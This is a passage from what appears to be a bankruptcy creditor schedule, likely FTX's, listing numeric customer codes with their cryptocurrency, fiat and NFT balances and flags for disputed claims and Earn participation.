| 07357641 | | CUSDT[4], DOGE[952.16309422], TRX[1], USD[0.00] | | |
| 07357642 | | USD[10.00] | | |
| 07357643 | | BAT[1], BRZ[2], DOGE[0], TRX[1], USD[0.35] | | |
| 07357644 | | USD[10.00] | | |
| 07357645 | | USD[10.00] | | |
| 07357646 | | USD[10.00] | | |
| 07357647 | | USD[10.00] | | |
| 07357649 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07357650 | | USD[10.97] | Yes | |
| 07357651 | | DOGE[1], USD[0.00] | | |
| 07357652 | | BRZ[1], CUSDT[18], NFT (368370568045311013/Coachella x FTX Weekend 2 #3006)[1], TRX[0], USD[0.00] | Yes | |
| 07357654 | | TRX[1], USD[0.00] | | |
| 07357655 | | BAT[.61318833], BRZ[1], CUSDT[5], SOL[.0082087], TRX[4], USD[0.10] | Yes | |
| 07357656 | | DOGE[677.76879509], USD[0.00] | | |
| 07357657 | | BTC[.0044829], ETH[.06673685], ETHW[.06673685], GRT[99.62], LINK[37.648795], SOL[19.924], SUSHI[34.933975], TRX[999.05], UNI[46.430745], USD[1008.83] | | |
| 07357658 | | BRZ[6.65182596], CUSDT[24.00002457], DOGE[3854.14149142], KSHIB[15.06263093], LTC[1.15380658], TRX[6], USD[0.00], USDT[0.00000927] | Yes | |
| 07357659 | | USD[10.00] | | |
| 07357660 | | USD[10.00] | | |
| 07357661 | | BRZ[1], CUSDT[2], DOGE[5], ETH[0.00000672], ETHW[0.00000672], GRT[3.05672146], MATIC[0], SHIB[2], SOL[0], TRX[4], USD[0.00], USDT[0.01240067] | Yes | |
| 07357662 | | ETH[0.03400000], ETHW[.034], USD[20.33] | | |
| 07357663 | | CUSDT[1], DOGE[1], ETH[.00380126], ETHW[.00380126], TRX[4], USD[0.01] | | |
| 07357664 | | USD[10.00] | | |
| 07357665 | | BRZ[2], BTC[0], CUSDT[3], DOGE[2], ETH[0], TRX[2], USD[0.01] | | |
| 07357666 | | USD[10.00] | | |
| 07357668 | | BRZ[1], BTC[.00698842], CUSDT[3], DOGE[412.85320082], SHIB[2], TRX[103.53270547], USD[0.00], USDT[49.75019976] | | |
| 07357670 | | DOGE[138.40715509], USD[0.00] | | |
| 07357671 | | DOGE[21.23147749], USD[0.00] | | |
| 07357672 | | USD[10.00] | | |
| 07357674 | | USD[10.00] | | |
| 07357675 | | USD[0.01], USDT[0] | | |
| 07357676 | | BRZ[1], CUSDT[16], DOGE[1], ETH[0], GRT[31.23695478], LINK[.90521456], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07357677 | | BRZ[1], SHIB[1], SOL[0], TRX[1], USD[0.00] | Yes | |
| 07357678 | | USD[11.06] | Yes | |
| 07357679 | | BAT[4], BRZ[1], BTC[0], CUSDT[6], DOGE[1], GRT[3], TRX[3], USD[0.95], USDT[1.00000001] | | |
| 07357680 | | BRZ[1], CUSDT[2], ETH[.00441175], ETHW[.00441175], TRX[7], USD[0.39] | | |
| 07357681 | | USD[10.00] | | |
| 07357682 | | SOL[.02375872], USD[0.01] | Yes | |
| 07357683 | | ETH[.00000001], USD[0.00] | | |
| 07357684 | | BTC[0], TRX[1.24109288], USD[0.00] | | |
| 07357685 | | BRZ[1], CUSDT[30], DOGE[5053.48685124], USD[0.00] | Yes | |
| 07357687 | | BRZ[0.00047596], BTC[0], DOGE[1], TRX[1], USD[0.00] | | |
| 07357689 | | USD[0.00] | | |
| 07357690 | | USD[10.00] | | |
| 07357691 | | BRZ[1], CUSDT[1], DOGE[1], TRX[2], USD[0.01] | | |
| 07357692 | | BAT[0], BTC[0], CAD[0.00], CUSDT[13], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], SOL[0], TRX[4], UNI[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07357693 | | USD[10.00] | | |
| 07357694 | | BTC[0], SHIB[1], USD[53.88] | Yes | |
| 07357695 | | USD[10.00] | | |
| 07357696 | | BRZ[1], CUSDT[1], DOGE[5], ETH[0.00004911], ETHW[0.00004911], GRT[0], SUSHI[0], TRX[6], USD[0.00] | | |
| 07357697 | | DOGE[2], SUSHI[2.33907915], TRX[1], USD[0.00] | | |
| 07357698 | | DOGE[0], ETH[0], ETHW[0], USD[0.00], USDT[0] | | |
| 07357699 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07357700 | | CUSDT[2], USD[0.01] | | |
| 07357701 | | USD[10.00] | | |
| 07357702 | | CUSDT[1], GRT[6.11765489], USD[0.00] | Yes | |
| 07357703 | | USD[10.00] | | |
| 07357704 | | CUSDT[1], DOGE[6475.73127195], USD[20.00] | | |
| 07357705 | | DOGE[103.91998764], USD[0.00] | | |
| 07357706 | | USD[10.00] | | |
| 07357707 | | USD[10.00] | | |
| 07357708 | | USD[10.00] | | |
| 07357711 | | BTC[0.04648799], ETH[0], ETHW[0.49958800] | | |
| 07357714 | | USD[10.00] | | |
| 07357715 | | USD[10.00] | | |
| 07357716 | | BRZ[1], BTC[0], CUSDT[3], DOGE[0], TRX[2], USD[0.00], USDT[0.00053313] | | |
| 07357717 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07357718 | | USD[10.00] | | |
| 07357719 | | USD[10.00] | | |
| 07357720 | | CUSDT[2], DOGE[3440.13500324], USD[0.00] | | |
| 07357721 | | USD[10.00] | | |
| 07357722 | | BTC[.00021164], USD[0.00] | | |
| 07357723 | | GRT[5.59363159], USD[0.00] | | |
| 07357724 | | DOGE[40.24545218], USD[0.00] | | |
| 07357725 | | USD[0.01] | | |
| 07357726 | | USD[10.00] | | |
| 07357727 | | USD[0.00] | | |
| 07357728 | | BTC[.0000824], DOGE[81.77704936], ETH[.00263434], ETHW[.00263434], USD[0.05] | | |
| 07357729 | | USD[10.00] | | |
| 07357730 | | USD[10.00] | | |
| 07357731 | | CUSDT[1], DOGE[27.32435411], USD[0.00] | | |
| 07357732 | | USD[10.00] | | |
| 07357733 | | USD[10.00] | | |
| 07357734 | | USD[0.01] | | |
| 07357735 | | DOGE[1], USD[0.11] | | |
| 07357736 | | DOGE[7406.54366415], USD[10.99] | Yes | |
| 07357737 | | BTC[.00010759], USD[0.00] | | |
| 07357738 | | USD[0.00] | | |
| 07357739 | | SOL[1.12643506], USD[0.00] | | |
| 07357740 | | BAT[.00048415], BRZ[2], CUSDT[9], DOGE[2.00833697], ETH[0], GRT[.00094009], SOL[0], TRX[4.093461], USD[0.01] | Yes | |
| 07357742 | | USD[10.00] | | |
| 07357744 | | NFT (305335021977575073/Series 1: Wizards #375)[1], NFT (324532659481145582/Saudi Arabia Ticket Stub #1107)[1], NFT (328602133496764620/Belgium Ticket Stub #182)[1], NFT (330078037657129844/Microphone #1308)[1], NFT (330981739731713416/Series 1: Capitals #415)[1], NFT (359206293906917657/FTX Crypto Cup 2022 Key #67)[1], NFT (363607890259510931/Austria Ticket Stub #63)[1], NFT (417514697588063480/Entrance Voucher #1459)[1], NFT (426024447315816757/Hungary Ticket Stub #124)[1], NFT (455423527320639096/Montreal Ticket Stub #201)[1], NFT (474418774324987431/Humpty Dumpty #590)[1], NFT (481545281681524000/The Hill by FTX #556)[1], NFT (495958940063573258/Silverstone Ticket Stub #390)[1], NFT (504863716204705148/France Ticket Stub #18)[1], NFT (506960818398554330/Baku Ticket Stub #241)[1], NFT (564262733419932686/Barcelona Ticket Stub #1384)[1] | Yes | |
| 07357745 | | USD[10.00] | | |
| 07357746 | | USD[10.70] | Yes | |
| 07357747 | | USD[10.00] | | |
| 07357748 | | NFT (515069166204979512/Montreal Ticket Stub #76)[1] | Yes | |
| 07357750 | | USD[10.00] | | |
| 07357751 | | CUSDT[6], DOGE[140.12559756], MATIC[9.60727695], TRX[277.8034125], USD[0.00] | | |
| 07357752 | | USD[10.00] | | |
| 07357753 | | BTC[0], DOGE[2], LINK[.00000001], SOL[1.55759028], TRX[1], UNI[1.10863751], USD[0.00] | Yes | |
| 07357754 | | BAT[1174.223], BCH[.000959], BTC[0.18477336], ETH[1.00071111], ETHW[1.00071111], LINK[87.2121], LTC[8.36499], MATIC[109.79], SOL[13.2885], SUSHI[242.197], TRX[6666.324], UNI[37.4327], USD[8546.78], USDT[.0079674] | | |
| 07357756 | | BTC[.00018007], USD[0.00] | | |
| 07357757 | | DOGE[140.79491966], USD[0.00] | | |
| 07357758 | | CUSDT[6], DOGE[.00004773], KSHIB[.75001542], TRX[1], USD[0.36] | Yes | |
| 07357760 | | USD[10.00] | | |
| 07357763 | | CUSDT[1], USD[0.34] | | |
| 07357764 | | USD[10.00] | | |
| 07357765 | | UNI[.33383682], USD[0.00] | | |
| 07357767 | | USD[10.00] | | |
| 07357768 | | CUSDT[2], DOGE[141.40623611], USD[0.00] | | |
| 07357769 | | CUSDT[942.6720042], DOGE[4089.00611562], TRX[2857.48412591], USD[0.00] | | |
| 07357770 | | BRZ[1], DOGE[1], USD[0.00] | | |
| 07357771 | | USD[10.00] | | |
| 07357772 | | BTC[0], DOGE[0], TRX[0], USD[26.22] | Yes | |
| 07357773 | | BRZ[5.07952967], BTC[.00081489], CUSDT[70.43089886], DOGE[1122.46739234], ETH[.07208018], ETHW[.07118492], GRT[36.43522096], LTC[.25831517], SHIB[167395.71204655], SOL[8.2703482], TRX[253.04446154], USD[2.80] | Yes | |
| 07357774 | | USD[10.00] | | |
| 07357776 | | USD[10.00] | | |
| 07357777 | | BCH[0], DOGE[0.28407664], USD[0.01], USDT[0] | Yes | |
| 07357779 | | USD[10.00] | | |
| 07357780 | | USD[0.01] | | |
| 07357781 | | CUSDT[1], DOGE[1], TRX[3], USD[0.00], USDT[0] | | |
| 07357783 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07357784 | | CUSDT[2], DOGE[507.37622716], USD[0.01] | | |
| 07357785 | | USD[10.00] | | |
| 07357786 | | CUSDT[3], TRX[1], USD[0.00] | | |
| 07357788 | | UNI[.1627242], USD[5.45] | Yes | |
| 07357789 | | CUSDT[2], USD[0.01] | | |
| 07357790 | | USD[10.00] | | |
| 07357791 | | BRZ[51.61847402], BTC[.00019361], CUSDT[462.96553499], DOGE[425.09165145], TRX[1], USD[0.01] | | |
| 07357792 | | CUSDT[5], DOGE[89.27370887], TRX[1], USD[0.00] | | |
| 07357793 | | DOGE[486.39110287], USD[0.00] | Yes | |
| 07357794 | | USD[10.00] | | |
| 07357795 | | BAT[3.75156858], BRZ[1], BTC[.00105281], CUSDT[612.02229574], DOGE[1], ETH[1.06620576], ETHW[1.06575796], GRT[1.00498957], LINK[1.22590751], SHIB[167539.46933467], SOL[1.23118063], SUSHI[.82257775], TRX[455.63361282], USD[0.00], USDT[0.00000363], YFI[.0003267] | Yes | |
| 07357796 | | CUSDT[3], DOGE[7256.7273658], TRX[1], USD[0.46] | Yes | |
| 07357797 | | CUSDT[2], DOGE[23.38602365], TRX[1], USD[0.00] | | |
| 07357798 | | GRT[.25510088], USD[0.00] | | |
| 07357799 | | DOGE[3], ETH[.09889048], ETHW[.09889048], USD[9.90], USDT[0] | | |
| 07357800 | | USD[10.00] | | |
| 07357801 | | USD[10.00] | | |
| 07357802 | | USD[10.00] | | |
| 07357803 | | USD[10.00] | | |
| 07357804 | | USD[10.00] | | |
| 07357805 | | BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], GBP[0.00], LTC[0], SUSHI[0], USD[0.00], YFI[0] | | |
| 07357808 | | DOGE[136.27825184], USD[0.00] | | |
| 07357809 | | DOGE[.06857935], USD[0.00] | | |
| 07357810 | | USD[10.00] | | |
| 07357811 | | USD[1.00] | | |
| 07357812 | | USD[10.00] | | |
| 07357813 | | USD[10.00] | | |
| 07357814 | | USD[0.00] | | |
| 07357815 | | CUSDT[506.58075219], DOGE[3431.15053386], KSHIB[247.05396964], SHIB[956646.40350587], USD[0.56] | Yes | |
| 07357816 | | USD[10.00] | | |
| 07357817 | | USD[0.00] | Yes | |
| 07357819 | | USD[10.00] | | |
| 07357820 | | GRT[1], TRX[1], USD[0.00] | | |
| 07357821 | | TRX[0], USD[0.00] | | |
| 07357822 | | BRZ[1], CUSDT[5], GRT[1], LINK[.10009106], TRX[7], USD[0.92] | | |
| 07357823 | | USD[10.00] | | |
| 07357824 | | USD[10.00] | | |
| 07357826 | | USD[10.00] | | |
| 07357828 | | BAT[1.0165555], BCH[.00055535], BRZ[3], BTC[.00000087], CUSDT[8], DOGE[3916.64827578], ETH[.00000648], ETHW[.00000648], GRT[2.0607959], TRX[6], USD[0.48], USDT[2.1948924] | Yes | |
| 07357829 | | SHIB[144990.57561258], USD[0.00] | | |
| 07357830 | | CUSDT[3], DOGE[.03043914], GRT[2.05822899], SOL[.00025556], TRX[.04647993], USD[0.00] | Yes | |
| 07357831 | | USD[10.00] | | |
| 07357832 | | BRZ[1], CUSDT[8], USD[0.00] | Yes | |
| 07357833 | | BAT[2.04974075], BRZ[1], CUSDT[1], DOGE[8771.7678475], GRT[1], SHIB[2], TRX[4], USD[0.11] | Yes | |
| 07357834 | | BTC[0], DOGE[0.00738814], USD[0.00] | Yes | |
| 07357835 | | USD[10.00] | | |
| 07357836 | | DOGE[.82034213], USD[12.15] | | |
| 07357837 | | DOGE[1], USD[0.02] | | |
| 07357838 | | BTC[.02420077], CUSDT[5], DOGE[5849.13130748], SHIB[3073140.74984634], TRX[1], USD[0.00] | | |
| 07357840 | | BAT[0], BCH[0], BTC[0.09867298], DOGE[1], ETH[1.04815998], ETHW[1.04771019], GRT[0], LINK[37.68945222], LTC[0], MATIC[490.40355171], NFT [502524502332732488/Entrance Voucher #3604][1], SHIB[6], SOL[20.45179504], SUSHI[0.00228321], TRX[1], UNI[41.24960997], USD[0.00], USDT[0.00000002], YFI[0] | Yes | |
| 07357842 | | BRZ[1], CUSDT[10], DOGE[1], GRT[2], TRX[8], USD[0.00], USDT[2] | | |
| 07357843 | | BRZ[3], CUSDT[5], DOGE[1889.61530148], GRT[165.16073655], TRX[1], USD[0.18] | | |
| 07357845 | | CUSDT[1], DOGE[48.85694087], SHIB[315161.57421802], SOL[0.00149414], TRX[19.32591955], USD[10.02] | Yes | |
| 07357846 | | BRZ[2], CUSDT[1], DOGE[2786.72075171], GRT[2893.28728727], TRX[2], USD[0.00] | | |
| 07357847 | | BTC[.00000015], USD[0.00] | | |
| 07357848 | | USD[10.00] | | |
| 07357849 | | DOGE[130.60490969], TRX[51.88285829], USD[0.00] | | |
| 07357851 | | USD[0.28] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07357852 | | USD[10.00] | | |
| 07357853 | | USD[10.00] | | |
| 07357854 | | USD[10.00] | | |
| 07357855 | | USD[10.00] | | |
| 07357856 | | CUSDT[2], DOGE[.00005912], TRX[1], USD[3.48] | | |
| 07357857 | | CUSDT[1], DOGE[17.83733895], USD[0.00] | | |
| 07357858 | | USD[0.00] | | |
| 07357859 | | DOGE[37.96007852], USD[0.00] | | |
| 07357860 | | BRZ[2], CUSDT[22], DOGE[18461.9226777], ETH[.05961497], ETHW[.05887571], GRT[1.00367791], SHIB[55171327.43615987], SOL[3.66099598], TRX[3101.1696844], USD[0.00], USDT[78.18063918] | Yes | |
| 07357861 | | USD[10.00] | | |
| 07357862 | | USD[10.00] | | |
| 07357863 | | BRZ[1], CUSDT[3], DOGE[3], GRT[1], TRX[3], USD[0.00], USDT[1] | | |
| 07357865 | | USD[0.01] | Yes | |
| 07357866 | | USD[10.00] | | |
| 07357869 | | USD[10.00] | | |
| 07357870 | | USD[10.00] | | |
| 07357871 | | USD[10.00] | | |
| 07357872 | | BAT[55.35246011], BRZ[1], CUSDT[15], DOGE[2], ETH[.01130601], ETHW[.01130601], GRT[2], MATIC[38.8598928], SHIB[1509212.15756112], TRX[1], USD[0.01], USDT[0] | | |
| 07357873 | | DOGE[1], SHIB[3], USD[0.01], USDT[0] | Yes | |
| 07357874 | | CUSDT[2], DOGE[1], USD[0.00] | | |
| 07357875 | | USD[10.00] | | |
| 07357876 | | CUSDT[1], DOGE[2], TRX[1], USD[0.00] | | |
| 07357877 | | DOGE[3860.7180522], USD[0.00] | | |
| 07357878 | | ETHW[.02070444], NFT [445607408346018224/Founding Frens Lawyer #842][1], USD[0.00] | Yes | |
| 07357879 | | ETH[0], USD[0.00] | | |
| 07357880 | | USD[10.00] | | |
| 07357881 | | BRZ[4], CUSDT[8], SOL[.00002372], SUSHI[.00003274], TRX[3.00003768], USD[0.01] | | |
| 07357882 | | USD[10.00] | | |
| 07357883 | | BTC[.00142582], CUSDT[3], DOGE[1646.02039981], TRX[1], USD[333.23], USDT[1.10844531] | Yes | |
| 07357884 | | BRZ[1], CUSDT[6], TRX[1], USD[0.01] | | |
| 07357885 | | USD[10.00] | | |
| 07357887 | | USD[10.00] | | |
| 07357888 | | USD[0.01], USDT[10.00] | Yes | |
| 07357889 | | USD[10.00] | | |
| 07357890 | | USD[10.00] | | |
| 07357892 | | BRZ[1], CUSDT[9], DOGE[0.06684642], GRT[1.00498957], TRX[4], USD[0.00] | Yes | |
| 07357893 | | DOGE[0], SHIB[389.34611602], TRX[0], USD[0.00] | Yes | |
| 07357894 | | USD[10.00] | | |
| 07357895 | | DOGE[253.88774314], USD[0.00] | | |
| 07357896 | | DOGE[807.43173418], USD[0.00] | | |
| 07357897 | | BTC[0], ETH[.00000001], USD[0.10], USDT[0] | | |
| 07357898 | | CUSDT[268.45937243], DOGE[1397.93501259], LINK[.69970933], TRX[1], USD[0.00] | Yes | |
| 07357901 | | DOGE[.17661418], USD[0.00] | | |
| 07357903 | | USD[10.85] | Yes | |
| 07357904 | | USD[10.00] | | |
| 07357905 | | USD[0.00] | | |
| 07357906 | | CUSDT[3], USD[0.00] | | |
| 07357907 | | USD[10.00] | | |
| 07357908 | | USD[10.00] | | |
| 07357909 | | USD[10.00] | | |
| 07357911 | | USD[0.00] | | |
| 07357912 | | CUSDT[2.07924372], DOGE[.00272145], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07357913 | | BRZ[2], CUSDT[4], DOGE[12.12074712], GRT[1587.22444334], KSHIB[187.8648335], LINK[.00002924], LTC[.90903557], MATIC[235.01928971], NFT [302303974760065359/KuArmy #10][1], NFT [335082000642568688/Black.Italy.Marble][1], NFT [337423949234148942/ Car collection #1][1], NFT [348017523008143944/Nespace Album #49][1], NFT [427106015064930329/PIG 01][1], NFT [430940114231536828/KuArmy #13][1], NFT [462241371291572938/Nespace Album #54][1], NFT [476347129243648815/Deer][1], NFT [481401325956914549/SD PIG 11][1], NFT [496516509570539565/KuArmy #6][1], NFT [501195172007746044/Nespace Album #58][1], NFT [539594176238561318/SD PIG 01][1], SHIB[199018.11880192], SUSHI[32.25103622], TRX[1245.5425741], UNI[1.05904344], USD[0.00] | Yes | |
| 07357916 | | BRZ[.9], BTC[.01129932], CUSDT[13.8], DOGE[99.32062098], ETH[.08891192], ETHW[.02490872], KSHIB[.43944746], SHIB[3016115.82620074], SOL[3.90438668], SUSHI[15.97903424], TRX[3.28576137], USD[0.00] | Yes | |
| 07357917 | | USD[10.00] | | |
| 07357918 | | DOGE[206.18684998], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07357919 | | USD[10.00] | | |
| 07357920 | | USD[10.00] | | |
| 07357921 | | TRX[70.73198265], USD[0.00] | | |
| 07357922 | | USD[10.00] | | |
| 07357924 | | CUSDT[2], DOGE[3643.50910994], ETH[.01883353], ETHW[.01883353], GRT[0], USD[0.00] | | |
| 07357925 | | DOGE[1], MATIC[8.4082802], USD[0.00] | Yes | |
| 07357926 | | USD[10.00] | | |
| 07357927 | | BTC[0], CUSDT[1], DOGE[1.00002392], SHIB[1173868.81939702], SOL[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07357929 | | BRZ[81.11637597], BTC[.00026472], CUSDT[3], DOGE[380.89566695], ETH[.0158633], ETHW[.0158633], EUR[24.46], PAXG[.00826505], TRX[571.02971849], USD[30.35], YFI[.00057128] | | |
| 07357930 | | BRZ[7], CUSDT[16], GRT[1], SHIB[2], TRX[8], USD[0.00], USDT[0.00000001] | | |
| 07357932 | | LTC[.00987], TRX[.416], USD[-0.56], USDT[0.00000001] | | |
| 07357933 | | BRZ[3], CUSDT[4], TRX[7600.71767216], USD[0.01] | | |
| 07357934 | | BRZ[1], DOGE[95.00391827], USD[0.49] | Yes | |
| 07357935 | | USD[10.00] | | |
| 07357936 | | ETH[.050802], ETHW[.050802], LINK[3.474], TRX[882.164], USD[0.00] | | |
| 07357937 | | USD[10.00] | | |
| 07357938 | | ETH[.00488778], ETHW[.00488778], USD[0.00] | | |
| 07357940 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07357941 | | DOGE[152641.31933606], USD[0.00] | | |
| 07357942 | | BAT[1], BRZ[2], CUSDT[3], DOGE[294.34149039], GRT[200.53923015], USD[127.71] | | |
| 07357943 | | BRZ[1], CUSDT[27], DOGE[100.3121402], ETH[.00097624], ETHW[.00097624], LTC[.02108228], TRX[49.73534086], USD[0.48] | | |
| 07357944 | | BRZ[1.74515223], CUSDT[4], USD[0.00], USDT[1] | | |
| 07357945 | | DOGE[34.51878173], USD[0.00] | Yes | |
| 07357946 | | USD[10.00] | | |
| 07357947 | | DOGE[1], USD[0.01] | | |
| 07357948 | | BTC[0], CUSDT[7], DOGE[0], TRX[1], USD[0.00] | | |
| 07357949 | | BAT[1.01585017], CUSDT[3], DOGE[.67983397], SHIB[832819.62145731], TRX[3], USD[0.69] | Yes | |
| 07357951 | | BTC[0], CUSDT[12], DOGE[88.51230045], ETH[0], GBP[0.00], GRT[0], LTC[.36187399], MATIC[20.11261596], SHIB[551294.20375189], SUSHI[4.78499969], TRX[0], UNI[0], USD[0.00] | Yes | |
| 07357952 | | USD[10.00] | | |
| 07357953 | | BTC[.00016931], DOGE[574.616399], USD[0.00] | | |
| 07357955 | | DOGE[2], USD[0.00] | | |
| 07357957 | | DOGE[32.9702963], USD[0.00] | | |
| 07357958 | | USD[10.00] | | |
| 07357959 | | DOGE[0], USD[709.29] | Yes | |
| 07357960 | | BAT[1.01655549], USD[0.01], USDT[0.00000001] | Yes | |
| 07357961 | | USD[10.00] | | |
| 07357963 | | DOGE[.00025609], TRX[1.00035374], USD[0.75] | | |
| 07357964 | | USD[0.00] | | |
| 07357965 | | BRZ[4], BTC[.00000044], CUSDT[15], GRT[2.03627078], LINK[5.48594881], SHIB[19549630.41482439], SOL[.00004099], TRX[.08498005], USD[0.00], USDT[.00026603] | Yes | |
| 07357966 | | USD[10.00] | | |
| 07357967 | | CUSDT[2], DOGE[.00227219], USD[0.00] | | |
| 07357968 | | USD[10.00] | | |
| 07357969 | | USD[10.00] | | |
| 07357971 | | USD[10.00] | | |
| 07357972 | | BAT[1], CUSDT[1], DOGE[3], TRX[2], USD[0.00] | | |
| 07357973 | | CUSDT[2], DOGE[1], TRX[1], USD[0.01] | | |
| 07357974 | | BTC[0], DOGE[2], ETH[0], USD[0.00] | Yes | |
| 07357976 | | USD[10.00] | | |
| 07357977 | | USD[10.00] | | |
| 07357978 | | DOGE[1], USD[0.01] | | |
| 07357979 | | USD[10.00] | | |
| 07357980 | | DOGE[768.31375625], TRX[175.16522911], USD[0.00] | Yes | |
| 07357981 | | USD[10.00] | | |
| 07357982 | | USD[10.00] | | |
| 07357983 | | USD[10.00] | | |
| 07357984 | | DOGE[0] | | |
| 07357986 | | USD[10.00] | | |
| 07357987 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07357988 | | USD[10.00] | | |
| 07357989 | | USD[10.00] | | |
| 07357990 | | USD[10.00] | | |
| 07357991 | | USD[10.00] | | |
| 07357992 | | BRZ[0], BTC[0], LTC[0], USD[0.01] | | |
| 07357993 | | USD[10.00] | | |
| 07357994 | | DOGE[1], USD[0.00] | | |
| 07357996 | | TRX[88.39277521], USD[0.00] | Yes | |
| 07357997 | | CUSDT[1], USD[0.06] | | |
| 07357998 | | DOGE[77.17702886], ETH[.00228382], ETHW[.00225646], USD[0.00], USDT[1.41035106] | Yes | |
| 07357999 | | USD[10.00] | | |
| 07358000 | | CUSDT[4], TRX[2], USD[28.95] | | |
| 07358003 | | ETH[.0065326], ETHW[.0065326], USD[0.00] | | |
| 07358004 | | USD[10.00] | | |
| 07358005 | | CUSDT[10], USD[0.01] | | |
| 07358006 | | DOGE[154.15467857], USD[0.00] | Yes | |
| 07358007 | | USD[10.00] | | |
| 07358008 | | USD[10.00] | | |
| 07358009 | | CUSDT[1], USD[0.01] | | |
| 07358010 | | CUSDT[1], DOGE[77.48540874], TRX[1], USD[1.34] | | |
| 07358011 | | USD[10.00] | | |
| 07358012 | | USD[10.00] | | |
| 07358013 | | USD[10.00] | | |
| 07358014 | | USD[10.00] | | |
| 07358015 | | BAT[2.13214994], BRZ[1], BTC[.00002303], CUSDT[65.34543924], DOGE[1.95084986], ETH[.00230236], ETHW[0.00227500], GRT[.10242481], LTC[0.00017378], MATIC[11.05136601], SHIB[5343.30750734], SOL[0.00014659], SUSHI[.00979531], TRX[6.23024682], UNI[.00911935], USD[0.00] | Yes | |
| 07358016 | | USD[10.00] | | |
| 07358017 | | USD[0.01] | Yes | |
| 07358018 | | TRX[0], USD[0.00] | | |
| 07358019 | | USD[10.00] | | |
| 07358020 | | DOGE[28.48719762], USD[0.00] | | |
| 07358021 | Contingent, Disputed | BAT[1], BRZ[4], CUSDT[7], DOGE[1], TRX[8], USD[0.00], USDT[3.00000001] | | |
| 07358022 | | USD[0.01] | | |
| 07358023 | | BRZ[1], CUSDT[1], USD[0.01] | | |
| 07358024 | | DOGE[0], NFT (36909964066907168/ApexDucks Halloween #2069)[1], NFT (39245939730665440/ApexDucks Halloween #316)[1], NFT (448477701887609098/ApexDucks Halloween #3045)[1], NFT (563267930481406837/ApexDucks Halloween #395)[1], SHIB[0], SOL[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07358025 | | DOGE[1], USD[123.21] | | |
| 07358026 | | BTC[.00020984], CUSDT[1], USD[0.00] | | |
| 07358027 | | USD[10.00] | | |
| 07358028 | | USD[10.00] | | |
| 07358029 | | USD[13.92] | | |
| 07358030 | | BTC[.00107831], DOGE[2], ETH[.00134488], ETHW[.0013312], TRX[309.28477], USD[0.00] | Yes | |
| 07358031 | | USD[10.00] | | |
| 07358033 | | USD[10.00] | | |
| 07358034 | | CUSDT[2], DOGE[.0635739], USD[14.65] | Yes | |
| 07358035 | | USD[10.00] | | |
| 07358036 | | USD[10.00] | | |
| 07358037 | | BRZ[3], CUSDT[8], DOGE[166.94923084], TRX[7], USD[0.00], USDT[0] | Yes | |
| 07358039 | | CUSDT[1], DOGE[1.00002645], SOL[0], USD[0.00] | | |
| 07358040 | | USD[10.00] | | |
| 07358041 | | BRZ[1], CUSDT[4], DOGE[5883.03762268], TRX[0.00002098], USD[0.01] | Yes | |
| 07358042 | | DOGE[19.85760469], USD[0.00] | | |
| 07358044 | | USD[10.00] | | |
| 07358045 | | USD[10.00] | | |
| 07358046 | | USD[10.93] | Yes | |
| 07358048 | | BAT[0.03121921], BTC[.00000042], CUSDT[7], ETH[.00000587], GRT[.0054477], MATIC[5.56326213], TRX[4], USD[0.00], USDT[0] | Yes | |
| 07358049 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07358050 | | USD[10.00] | | |
| 07358051 | | BAT[1], CUSDT[1], DOGE[30.43850656], USD[0.00] | | |
| 07358052 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07358053 | | CUSDT[3], DOGE[1.00011777], SHIB[889809.0022706], USD[0.00] | | |
| 07358054 | | BCH[0], BTC[0], DOGE[1], ETH[0], LTC[0], MATIC[0], SHIB[14903.44753567], SOL[0], SUSHI[0], TRX[0], USD[0.01], YFI[0] | Yes | |
| 07358055 | | USD[10.00] | | |
| 07358057 | | SHIB[716.40604949], TRX[1], USD[0.00] | Yes | |
| 07358058 | | USD[10.00] | | |
| 07358059 | | USD[10.00] | | |
| 07358060 | | USD[10.00] | | |
| 07358061 | | DOGE[1], ETH[.00513325], ETHW[.00513325], USD[0.00] | | |
| 07358062 | | USD[10.00] | | |
| 07358063 | | USD[10.00] | | |
| 07358064 | | USD[10.00] | | |
| 07358065 | | USD[10.00] | | |
| 07358066 | | AAVE[1.07633654], ALGO[119.17501214], AVAX[2.60668682], BAT[117.82803243], BCH[1.84930022], BRZ[729.01755574], BTC[.02637122], CUSDT[38], DOGE[206.89180243], DOGE[1841.08749087], ETH[.2245667], ETHW[.2243646], GRT[61.70903407], KSHIB[1476.68520792], LINK[21.44109782], LTC[1.88205404], MATIC[2471.23814611], NEAR[7.30491051], SHIB[33541490.62680948], SOL[53.52957476], SUSHI[429.5150443], TRX[59298.73027114], UNI[218.29728644], USD[0.00] | Yes | |
| 07358067 | | GRT[1], USD[0.00], USDT[1] | | |
